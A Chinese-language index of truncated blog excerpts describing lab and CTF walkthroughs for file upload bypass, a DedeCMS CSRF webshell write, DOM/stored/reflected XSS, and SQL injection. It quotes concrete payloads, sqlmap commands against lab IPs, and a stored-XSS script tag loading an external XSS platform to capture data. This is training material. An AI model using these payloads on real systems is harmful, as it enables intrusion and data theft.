文件上传漏洞总结 1-19
Pass-01: 先建立一个<?php phpinfo();?> 的txt文本改为123.jpg 在上传时打开burp suite 开始抓包,并改后缀为.php 查看图片则会执行PHP语句,出现phpinfo()Pass
CSRF跨站伪造请求 - 屠龙宝刀点击就送
首先打开靶场,发现是 DedeCMS_V57_UTF8_SP1 版本,去查找改版本的通杀漏洞发现可以通过/dede/sys_verifies.php 这个文件可以写入一句话使用http://117.41.229.122:8010/csrf/uploads/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&a
DOM XSS靶场
打开靶场 找注入点 发现/3/处可以使用 ?")</script>与前面的语句闭合 并使用<script>alert(555)</script> 弹窗此处使用的是 <img src =1 onerror=alert(123)> 图片链接的弹窗在dom.php?url 后
存储型Xss靶场
首先打开靶场 在靶场中测试是否存在xss发现弹框,存在xss使用xss平台在 117.41.229.122:8082/index.php?c=mail&m=test 中使用<script scr=http://xss.tf/WOo></script> 在xss平台查看 得到flag
9.1、反射型XSS靶场 (Rank: 5)
首先打开靶场发现是 xss型 发现输入框就查看是否有弹窗 按 F12 查看源码 输入 "><script>alert(1)</script> 发现没有被执行然后输入<script>alert(1)</script> 发现括号被过滤使用一个事件触发器这里使用 "oncl
6.6.3-SQL注入-Post注入Rank 3
打开靶场,使用之前的方法进行注入,发现怎么都不显示出来结果和爆出,仅仅爆字段的错误这里我们用到工具sqlmap 使用 sqlmap.py -u "http://120.203.13.75:8150/New/PostBased/RankThree/sql-three/" --form 然后使用sqlmap.py -u "h
6.6.2-SQL注入-Post注入Rank 2
打开靶场, 使用 1' or 1=1# 注入是发现 需要 双引号和闭合括号于是,使用 1") or 1=1# 发现成功登陆然后再查字段根据字段查当前数据库和版本号根据数据库名查表名根据表查列根据列名查 内容
6.6.1-SQL注入-Post注入Rank 1
先打开靶场,在文本框内输入万能密码 1' or 1=1# 或者 1' or 1=1 -- 发现登录成功然后查字段,提示报错将字段减少一个试试。发现没有显示任何内容,那就是查询成功。然后根据字段查询 数据库名和版本号。然后根据数据库名查 表名 可以使用 limit 0,1 一个一个爆出来也可以用1' or 1=2 u
6.5.1-SQL注入-Header注入Rank 3
打开靶场输入admin ,然后发现,勾选什么都没用。 WTF?最后找辅导员才知道,这是用另一个 cookie 插件, em......辅导员给的是谷歌的,这里我用的是火狐的打开火狐浏览器右上角的菜单,在弹出的对话框中选“我的组件”然后在搜索框中输入“Cookie Quick Manager” 点击那个放大镜按钮,就会开始搜索。hhh然后点击搜索的结果因为我这是已
6.5.1-SQL注入-Header注入Rank 2
打开靶场,按上一次的操作发现这次不显示任何东西,em.......因为这是head注入,既然User Agent 不行,就试试Referrer ,勾选Referrer然后输入 1' 发现报错,可行。再 使用 1' or updatexml(0,concat(0x3a,database()),0))# 爆数据库发现当前数据库为 security使用 1